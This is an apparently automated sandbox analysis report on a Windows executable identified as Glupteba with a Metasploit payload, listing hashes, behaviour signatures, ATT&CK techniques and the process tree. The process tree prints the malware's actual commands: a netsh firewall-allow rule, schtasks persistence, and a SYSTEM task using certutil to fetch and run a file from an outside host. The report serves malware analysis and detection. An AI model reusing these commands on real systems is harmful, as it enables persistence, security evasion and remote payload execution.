Analysis

  • max time kernel
    138s
  • max time network
    183s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    07-07-2022 20:55

General

  • Target

    4410ec58b93c0b34d91044998994ee6cf73026102795be93a945a3c803295539.exe

  • Size

    4.4MB

  • MD5

    4e65a4077f352f0d56a54e87fa5e39b2

  • SHA1

    905fdd590c50ef59b1a33ab8d8dd8b10d48b976d

  • SHA256

    4410ec58b93c0b34d91044998994ee6cf73026102795be93a945a3c803295539

  • SHA512

    b768d3d057f1acd12758616abf6ae311985303ea45ec2c4e3b3387891228db9a05a8316b275c65c1c78fe5d7c846993cac4545c24449147920dcdc772840bfe5

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 10 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4410ec58b93c0b34d91044998994ee6cf73026102795be93a945a3c803295539.exe
    "C:\Users\Admin\AppData\Local\Temp\4410ec58b93c0b34d91044998994ee6cf73026102795be93a945a3c803295539.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1884
    • C:\Users\Admin\AppData\Local\Temp\4410ec58b93c0b34d91044998994ee6cf73026102795be93a945a3c803295539.exe
      "C:\Users\Admin\AppData\Local\Temp\4410ec58b93c0b34d91044998994ee6cf73026102795be93a945a3c803295539.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1656
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1892
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:1016
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        PID:832
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:432
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1888
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220707230601.log C:\Windows\Logs\CBS\CbsPersist_20220707230601.cab
    1⤵
    • Drops file in Windows directory
    PID:1352

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Disabling Security Tools

2
T1089

Modify Registry

3
T1112

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\rss\csrss.exe
    Filesize

    4.4MB

    MD5

    4e65a4077f352f0d56a54e87fa5e39b2

    SHA1

    905fdd590c50ef59b1a33ab8d8dd8b10d48b976d

    SHA256

    4410ec58b93c0b34d91044998994ee6cf73026102795be93a945a3c803295539

    SHA512

    b768d3d057f1acd12758616abf6ae311985303ea45ec2c4e3b3387891228db9a05a8316b275c65c1c78fe5d7c846993cac4545c24449147920dcdc772840bfe5

  • C:\Windows\rss\csrss.exe
    Filesize

    4.4MB

    MD5

    4e65a4077f352f0d56a54e87fa5e39b2

    SHA1

    905fdd590c50ef59b1a33ab8d8dd8b10d48b976d

    SHA256

    4410ec58b93c0b34d91044998994ee6cf73026102795be93a945a3c803295539

    SHA512

    b768d3d057f1acd12758616abf6ae311985303ea45ec2c4e3b3387891228db9a05a8316b275c65c1c78fe5d7c846993cac4545c24449147920dcdc772840bfe5

  • \Windows\rss\csrss.exe
    Filesize

    4.4MB

    MD5

    4e65a4077f352f0d56a54e87fa5e39b2

    SHA1

    905fdd590c50ef59b1a33ab8d8dd8b10d48b976d

    SHA256

    4410ec58b93c0b34d91044998994ee6cf73026102795be93a945a3c803295539

    SHA512

    b768d3d057f1acd12758616abf6ae311985303ea45ec2c4e3b3387891228db9a05a8316b275c65c1c78fe5d7c846993cac4545c24449147920dcdc772840bfe5

  • \Windows\rss\csrss.exe
    Filesize

    4.4MB

    MD5

    4e65a4077f352f0d56a54e87fa5e39b2

    SHA1

    905fdd590c50ef59b1a33ab8d8dd8b10d48b976d

    SHA256

    4410ec58b93c0b34d91044998994ee6cf73026102795be93a945a3c803295539

    SHA512

    b768d3d057f1acd12758616abf6ae311985303ea45ec2c4e3b3387891228db9a05a8316b275c65c1c78fe5d7c846993cac4545c24449147920dcdc772840bfe5

  • memory/832-77-0x0000000000400000-0x000000000302B000-memory.dmp
    Filesize

    44.2MB

  • memory/832-76-0x0000000000400000-0x000000000302B000-memory.dmp
    Filesize

    44.2MB

  • memory/832-74-0x0000000003440000-0x000000000387C000-memory.dmp
    Filesize

    4.2MB

  • memory/832-72-0x0000000003440000-0x000000000387C000-memory.dmp
    Filesize

    4.2MB

  • memory/832-70-0x0000000000000000-mapping.dmp
  • memory/1016-65-0x0000000000000000-mapping.dmp
  • memory/1016-67-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmp
    Filesize

    8KB

  • memory/1656-60-0x00000000033D0000-0x000000000380C000-memory.dmp
    Filesize

    4.2MB

  • memory/1656-66-0x0000000000400000-0x000000000302B000-memory.dmp
    Filesize

    44.2MB

  • memory/1656-63-0x0000000000400000-0x000000000302B000-memory.dmp
    Filesize

    44.2MB

  • memory/1656-62-0x00000000033D0000-0x000000000380C000-memory.dmp
    Filesize

    4.2MB

  • memory/1656-73-0x0000000000400000-0x000000000302B000-memory.dmp
    Filesize

    44.2MB

  • memory/1884-61-0x0000000000400000-0x000000000302B000-memory.dmp
    Filesize

    44.2MB

  • memory/1884-54-0x00000000031A0000-0x00000000035DC000-memory.dmp
    Filesize

    4.2MB

  • memory/1884-59-0x0000000000400000-0x000000000302B000-memory.dmp
    Filesize

    44.2MB

  • memory/1884-58-0x00000000035E0000-0x0000000003F06000-memory.dmp
    Filesize

    9.1MB

  • memory/1884-57-0x0000000000400000-0x000000000302B000-memory.dmp
    Filesize

    44.2MB

  • memory/1884-56-0x00000000035E0000-0x0000000003F06000-memory.dmp
    Filesize

    9.1MB

  • memory/1884-55-0x00000000031A0000-0x00000000035DC000-memory.dmp
    Filesize

    4.2MB

  • memory/1892-64-0x0000000000000000-mapping.dmp